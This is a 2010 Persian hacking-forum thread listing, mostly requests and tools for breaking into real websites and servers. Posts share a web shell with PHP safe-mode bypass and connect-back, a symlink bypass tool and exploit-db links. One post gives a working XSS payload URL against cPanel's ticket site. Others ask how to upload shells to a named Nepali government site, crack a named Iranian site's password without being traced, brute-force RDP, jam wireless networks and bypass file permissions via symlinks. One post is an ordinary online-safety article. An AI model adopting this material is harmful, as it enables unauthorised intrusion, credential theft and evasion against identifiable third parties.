Shabgard.ORG - بخش هک و سکیوریتی

ItSecTeam Shell

AmooJoon — Mon, 06 Sep 2010 14:21:37 GMT

سلام دوستان
ورژن جدید شل itsecteam پابلیک شد این شلر قبلیت های زیادی داره از جمله بایپس php تا ورژن 5.3.1 و قابلیت connect back و پشتیبانی از دیتابیس های مختلف.
فایل ضمیمه شد.

فايل هاي ضميمه

itsec.zip (9.4 KB)

Sun Symlink Safe-Over [Bypass Forbidden Error - Safe-Mode Prior 5.3.1]

bl4ckl0rd — Sun, 05 Sep 2010 18:52:12 GMT

۱- تمام ارور های ۴۰۳ یا forbidden که هنگام حمله symlink بهش بر می خورید بایپس می کنه(این متود ۱۰۰٪ خصوصی بوده...یک متود در گذشته بود که الان کار نمی کنه)

۲-اگر سرور مورد حمله safemode رو on هم کرده باشه بازهم تا نسخه ی ۵.۳.۱ دور می خوره که اینم بی نظر هست...

فیلم :
http://www.4shared.com/file/F-DOODHu/SS-Film.html
دانلود:
http://tool.sun-army.org

تشخیص نوع دیتا بیس یک سایت و..

f-sadeghi — Sun, 05 Sep 2010 13:21:00 GMT

میخواهم pass یک سایتی رو inject کنم user به راحتی inject میشه ولی پسورد نه علتش چیه؟

RDP Brute forcer

irph — Sun, 05 Sep 2010 11:42:53 GMT

سلام من احتیاج به یک بروتر قوی برای rdp دارم

نرم افزار TScrarck خوبه اما از ورژن 2.1.77 به بعد خوبه چون قابلیت Brute force داره نه فقط
dictionary attack
اگر کسی این ورژن رو داره خواهشا بده :23:

امکان رد یابی هست؟

mg_mahyar — Sat, 04 Sep 2010 19:02:39 GMT

سلام
من نیاز دارم یک سایت ایرانی رو یک پسوردشو به دست بیارم. میخواستم بدونم اگر برم پاساژ پایتخت که اینترنت وایرلس داره و بشینم اونجا و یه نفر با تیم ویور به سیستم من متصل بشه و اونجوری سایت رو هک کنیم امکان ردیابیمون هست؟
سایت سامانه سیدا هست

Acunetix WVS Version 7 Released

bernawolf_hatef — Fri, 03 Sep 2010 07:10:07 GMT

جهت اطلاع به علاقه مندان این برنامه

لینک:

http://www.acunetix.com/blog/news/ac...ost-effective/

whats new ?
http://www.youtube.com/watch?v=rpICa322TgQ

اجرای php

Amirreza.M — Wed, 01 Sep 2010 16:37:55 GMT

سلام
رو یه سایت می خوام شل آپلود کنم
به آپلود سنتر ازش دارم که می تونم هر فایلی حتی htaccess هم بریزم
وقتی php می ریزم و می خوام اجرا کنم Internal Server Error این ارور رو میده
می خواستم ببینم میشه فایلی گذاشت که بشه php ران کرد

Abysssec - MOAUB Project

pouya_server — Tue, 31 Aug 2010 18:58:02 GMT

من که خیلی چشم براهشون بودم
اصل خبر

کد:

http://www.exploit-db.com/moaub-0days-binary-analysis-exploit-pocs/

برای دشت اول هم که Adobe و cpanel رو نشونه رفتن

کد:

Cpanel

http://www.exploit-db.com/exploits/14854/



Adobe

http://www.exploit-db.com/exploits/14853/

روز 3

کد:

Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution

http://www.exploit-db.com/exploits/14878



Visinia 1.3 Multiple Vulnerabilities

http://www.exploit-db.com/exploits/14879

و چهارمین روز

کد:

Movie Maker Remote Code Execution

http://www.exploit-db.com/exploits/14886/



syndeocms 2.8.02 Multiple Vulnerabilities

http://www.exploit-db.com/exploits/14887/

روز پنجم

کد:

Microsoft MPEG Layer-3 Remote Command Execution Exploit

http://www.exploit-db.com/exploits/14895



IfNuke Multiple Remote Vulnerabilities 0day

http://www.exploit-db.com/exploits/14898

1+1+1+1+1+1=ششمین روز

کد:

HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution

http://www.exploit-db.com/exploits/14916



InterPhoto Gallery Multiple Remote Vulnerabilities

http://www.exploit-db.com/exploits/14915

هفت !

کد:

Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

http://www.exploit-db.com/exploits/14928



DynPage <= v1.0 Multiple Remote Vulnerabilities - 0day

http://www.exploit-db.com/download_pdf/14929

هفت بر عکس ...

کد:

Microsoft Office Visio DXF File Stack based Overflow

http://www.exploit-db.com/exploits/14944



Sirang Web-Based D-Control Multiple Remote Vulnerabilities 

http://www.exploit-db.com/exploits/14943

هفته اول + دو روز

کد:

Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

http://www.exploit-db.com/exploits/14949



FestOS CMS 2.3b Multiple Remote Vulnerabilities

http://www.exploit-db.com/exploits/14948

Cpanel xss

Napst3r — Mon, 30 Aug 2010 21:44:54 GMT

XSS تو سایت Cpanel

PHP کد:


		
			
https://tickets.cpanel.net/submit/index.cgi?step=%27&reqtype=sales&product=%22%3E%3Cscript%3Ealert%2823%29%3C/script%3E

https://tickets.cpanel.net/submit/in...9%3C/script%3E

فايل هاي ضميمه

cod.txt (114 Bytes)

خطرناکترین کارهای آنلاینی که می توان انجام داد

ROTIL — Sun, 29 Aug 2010 01:18:47 GMT

محققان مرکز خدمات ایمنی اینترنت Cyber Defender با بررسی خطرناکترین فعالیتهایی که می توان به صورت آنلاین انجام داد به توضیح چگونگی محافظت در برابر این خطرات پرداختند. با طرح این سوالات که تا چه اندازه به فعالیتهای آنلاینی که انجام می دهید، وب سایتهایی که به آن مراجعه می کنید و حتی لینکهایی که در صفحات اینترنتی بر روی آن کلیک می کنید توجه دارید؟

شاید نتوان گفت تمامی فعالیتهای آنلاین می توانند برای رایانه، کاربر و حریم خصوصی کاربر مخرب و خطرساز باشد اما به طور قطع تعدادی از این فعالیت ها هستند که انجام آنها به تنهایی می توانند مشکلات بزرگ و گاه غیر قابل جبرانی را برای کاربران به وجود آورند.
خطر اول:
فعال کردن گزینه "ورود من به سیستم را ثبت کن" (Keep me signed in) در رایانه های عمومی
راه محافظت:
- ساده ترین راه حل این است که اگر از رایانه شخصی خود استفاده نمی کنید، هرکز این گزینه را فعال نکنید.

- اگر از مکانی عمومی به وب سایتهای مانند گوگل، آمازون و یا ای-بی وارد شده اید، در پایان کار از خروج از وب سایت اطمینان حاصل کنید. (Sign out)

- برای حفظ حریم خصوصی خود پس از پایان کار با رایانه تاریخ مرورگر اینترنتی خود را پاک کنید.

- برای جلوگیری از کنترل فعالیتهای آنلاین خود می توانید از حالت "پنهانی" مرورگر خود استفاده کنید. این حالت در اینترنت اکسپلورر 8، InPrivate Browsing و در کروم گوگل New Incognito Window نام دارد.

- هرگز هیچ رمز عبوری را بر روی مرورگر خود ذخیره نکنید، حتی اگر مرورگر از شما این را بخواهد زیرا افراد دیگری می توانند به راحتی از آن استفاده کنند.

- درباره رایانه های محل کارتان محتاط باشید زیرا تنها تا زمانی که در محل کارتان باشید در اختیار شماست و بقیه روز می تواند در دسترس دیگران باشد و دیگران نیز می توانند تمامی اطلاعات شخصی شما را به راحتی برای خود ارسال کنند.
خطر دوم:
به روز نکردن ویندوز، جاوا، ادوبی ریدر، ادوبی فلش

راه محافظت:
- برنامه های جاوا، فلش و ریدر در صورت به روز رسانی نشدن به دلیل نقصهای ایمنی، مسئول بسیاری از آلودگی های رایانه ای هستند. ساده ترین راه خلاصی از چنین آلودگی هایی به روز رسانی دائمی این چند نرم افزار است، فلش برای به روز رسانی به صورت خودکار از شما تقاضا می کند اما برای به روز رسانی جاوا کاربر باید به صورت روزانه اقدام کند. همچنین ادوبی ریدر نیز از سیستم به روز رسانی خودکار برخوردار است.

- از به روز رسانی سیستم عامل ویندوز اطمینان حاصل کنید. یکی از راه های اینکار قرار دادن تنظیمات ویندوز بر روی به روز رسانی خودکار است. این کار رایانه و نقاط ضعف ایمنی سیستمهای عامل را کمتر در دسترس هکرها قرار خواهد داد.
خطر سوم:
جستجوی شایعات درباره افراد مشهور یا موضوعات غیر اخلاقی

راه محافظت:
- محافظت از این خطر دیگر نیازی به فکر کردن ندارد. به دلیل اینکه این موضوعات مواردی هستند که هکرها از گرایش ناخواسته تعداد زیادی از کاربران اینترنتی به آنها آگاهی دارند. از این موضوعات برای حمله های جدید به رایانه ها به خوبی استفاده می کنند، پس ساده ترین راه حل این است که دور چنین وب سایتها و جستجوهای اینترنتی را خط بکشید.

- در صورتی که مجبور به جستجوی چنین مفاهیمی هستید، از بخشهای خبری سایتهایی مانند گوگل یا بینگ استفاده کنید زیرا این سایتها از وب سایتهای مرجع ارزیابی اولیه ای دارند و این می تواند از میزان احتمال آلوده شدن رایانه ها بکاهد.

- زمانی که قصد جستجو در گوگل را دارید از آدرس https://www.google.com به جای http://www.google.com استفاده کنید زیرا این آدرس اطلاعات مورد نظر شما را به لایه ای محافظت شده و رمزگذاری شده ارسال می کند. این روش نیز می تواند میزان آلودگی به ویروسهای رایانه ای را در این شرایط کاهش دهد.

خطر چهارم:
استفاده از BitTorrent برای دانلود نرم افزارها، برنامه های تلویزیونی و فیلمهای تحت قانون حق تکثیر

راه محافظت:

- فقط از وب سایتهای قانونی و رسمی دانلود مانند iTunes، Hulu و دیگر وب سایتهای قانونی استفاده کنید و به هر قیمتی از سایتهای تورنت یا سیلابیحتی اگر آلوده به ویروس نیز نباشند، استفاده نکنید. زیرا برخی از تبلیغات ارسال شده بر روی این وب سایتها می توانند بدون انجام کاری خاص از جانب کاربر، رایانه را آلوده کنند.

- اطلاعات و مطالب به سرقت رفته را دانلود نکنید.

- هرگز اطلاعات و مطالب به سرقت رفته را دانلود نکنید!!
خطر پنجم:
بازی آنلاین در هر وب سایتی

راه محافظت:

- در هنگام دانلود نرم افزارهای بازیهای رایگان بسیار احتیاط کنید زیرا اگر نرم افزار آلوده باشد می تواند رایانه را در خطر قرار دهد.

- اطلاعات ورود به بازی خود را در اختیار غریبه ها قرار ندهید. در واقع هیچ نوع اطلاعات شخصی یا غیر شخصی خود را در اختیار همبازی های آنلاین خود قرار ندهید زیرا در این صورت و در ساده ترین حالت دارایی های مجازی خود را از دست خواهید داد و در بدترین حالت پولهایتان به سرقت خواهد رفت.

- فریب حیله قدیمی "رازهای فارم ویل" را نخورید زیرا به این شکل یک ویروس تروجان را دانلود کرده اید و یا اطلاعات فیس بوک خود را در اختیار یک تبهکار مجازی قرار داده اید.

خطر ششم:
تنظیم نکردن بخش ایمنی فیس بوک و فعال گذاشتن گزینه قرار دادن اطلاعات در اختیار "همه"
راه محافظت:

- تنظیمات ایمنی فیس بوک را با دقت مطالعه کنید و اجازه ندهید بخش "دوست دوستانم" امکان دیدن اطلاعاتی از قبیل شماره تلفن، تاریخ تولد و دیگر اطلاعات خصوصی را داشته باشند. از تمامی چنین اطلاعاتی می توان برای جعل هویت شما بر روی کارتهای اعتباری دیگر استفاده کرد.

- تنها "دوستان" باید به لایه های شخصی تر اطلاعات شما دسترسی داشته باشند. از این رو در انتخاب "دوستان" خود دقت کنید.
خطر هفتم:
اتصال به شبکه های وایرلس ناشناخته
راه محافظت:
- در مکانهای عمومی مانند فرودگاه ها و هتلها مراقب اتصال به شبکه های وایرلس ناشناخته باشید. برای مثال در یک هتل از انتخاب یک شبکه شناخته شده و قانونی اطمینان حاصل کنید. زیرا در حالی که شما از محیطی به ظاهر ایمن و واقعی در اینترنت استفاده می کنید، هکرها می توانند شما را تحت نظر داشته باشند.

- تنظیم حالت استفاده در اماکن عمومی از لپ تاپ، ایمنی بیشتری برای آن به ارمغان خواهد آورد و به اشتراک نگذاشتن فایلهای مختلف در اماکن عمومی می تواند این ایمنی را افزایش دهد.
خطر هشتم:
استفاده از یک رمز عبور برای تمامی فعالیتهای آنلاین

راه محافظت:

- به خاطر سپردن ده ها رمز ورود کار بسیار دشواری است و از این رو چیز عجیبی نیست که فردی از یک رمز عبور برای تمامی فعالیت های آنلاینش استفاده کند. اما اگر همان یک رمز عبور نیز شناسایی شود کل زندگی آنلاین شما برای جهان آشکار خواهد شد.

- رمزهای عبور مختلف را برای کارهای مختلف نگه دارید. برای مثال رمز عبور ایمیل خود را متفاوت از رمز ورود به شبکه اجتماعی خود انتخاب کنید.

- مرورگرهای ویژه ای می توانند به شما در داشتن یک رمز ورود اصلی برای دسترسی به تمامی رمز ورودهایتان کمک کنند. به این شکل اگر برای خدمات مختلف آنلاین رمزهای متفاوتی داشته باشید تنها با به یاد سپردن یک رمز عبور می توانید تمامی آنها را در زمان نیاز مشاهده کنید.
خطر نهم:
تلاش برای گرفتن آی-پد، پلی استیشن 3 و یا دیگر ابزارهای الکترونیکی به صورت رایگان

راه محافظت:
- منطقی باشید، هرگز کسی یک آی-پد یا دیگر ابزارهای الکترونیکی رایگان به شما نخواهد داد، پس فریبش را نخورید.

- از هر نوع بذل و بخشش آنلاین که هیچ برند مشهوری از آن پشتیبانی نمی کند روگردان باشید، حتی اگر این پیشنهاد تحت حمایت برندهای آنلاین باشد.

- به بسته نرم افزاری ایمنی به روز شده ای مجهز باشید زیرا نرم افزارها معمولا می توانند چنین پیشنهادهای تبهکارانه ای را ردیابی کرده و از فریب خوردن شما جلوگیری کنند

مشکل در آپلود شل

conter — Fri, 27 Aug 2010 18:46:52 GMT

سلام دوستان من هرچی میخوام شل C99 یا C100 رو روی این سایت : http://www.dcwbtanahun.gov.np/
آپلود کنم نمیشه میگه YOUR NOT ALLOWED TO UPLOAD SUCH AS THIS TYPE
چه شکلی میتونم این شل رو روش آپلود کنم ؟؟؟

شل تحت ويندوز با قابليت فشرده سازي

pes2010 — Fri, 27 Aug 2010 13:22:22 GMT

سلام

كسي وب شل تحت وب سرور ويندوز (ترجيحا aspx باشه) داره كه قابليت اين رو داشته باشه كه يكسري فولدر و فايل رو انتخاب كني بعد فشرده zip كنه؟
اگر داريد يه حالي بديد قربون دستون :19:

$$ یک مشکل نافرم با symlink !!!!!!!!!!!!!

ITCC — Thu, 26 Aug 2010 21:29:22 GMT

سلام

دوستان من از طریق Cron تونستم symlink انجام بدم ادرس یه فایل به این صورت هست

نقل قل:

/home/target/public_html/app1/1.asp /home/maaaaan/public_html/sm/conf1

و خیلی قشنگ میاد واسم فایلو

و وقتی میرم فایل conf1 رو بارگزاری میکنم تو مرورگر مثه بچه ادم باز میشه ولی وقتی میخوام این فایلو براش ش***رت کات بسازم

/

نقل قل:

home/target/public_html/app2/1.asp /home/maaaaan/public_html/sm/conf2

OR

/home/target/public_html/app2/1.php /home/maaaaan/public_html/sm/conf2

ساخته میشه ! ولی وقتی فایلconf2 رو تو مرورگر باز میکنم : با این ارور لعنتی مواجه میشم :

Forbidden

You don't have permission to access /sm/conf2 on this server

راه حلی ندارید بتونم دورش بزنم ؟ (درضمن از وجود فایل تو اون ادرس 100 درصد مطمعنم )

بجز اینکه روت بشم و اینجور قبیل کار ها ایا روش بهتر و ساده تری نیست ؟ چون امنیت سرور واقعا خوبه و سخته که بتونم root access بگیرم

مثلا نمیشه محتویات فایل 1.asp یا 1همون 1.php رو تو یه فایل به صورت زیپ ریخت بعد اون فایل رو اجرا کرد ؟ اینجوری بنظرم Fordbin Erorr نده ؟

خواهشا راهنمایی کنید خیلی مهمه

و تشکر از توجهتون

.

نویز روی دکل وایرلس

x7337x — Mon, 23 Aug 2010 21:42:59 GMT

سلام

چطور میشه کاری کرد که تو یه منطقه یا یه ساختمان طرف نتونه وایرلس بگیره؟

تشکر

ریکاوری پسورد لینوکس ریموت

3v1l — Mon, 23 Aug 2010 14:36:08 GMT

با سلام

دوستان یک سروری هست که خارج از ایران هست و rhel .
میدونم پسورد 5 حرفی هست و دنبال بدست آوردنش هستم . و تا حدودی هم میدونم چه حروفی هستند . حالا میشه dictiopnary attack کرد یا نه ؟؟

اگر ممکنه راهنمایی کنین

با تشکر
3v1l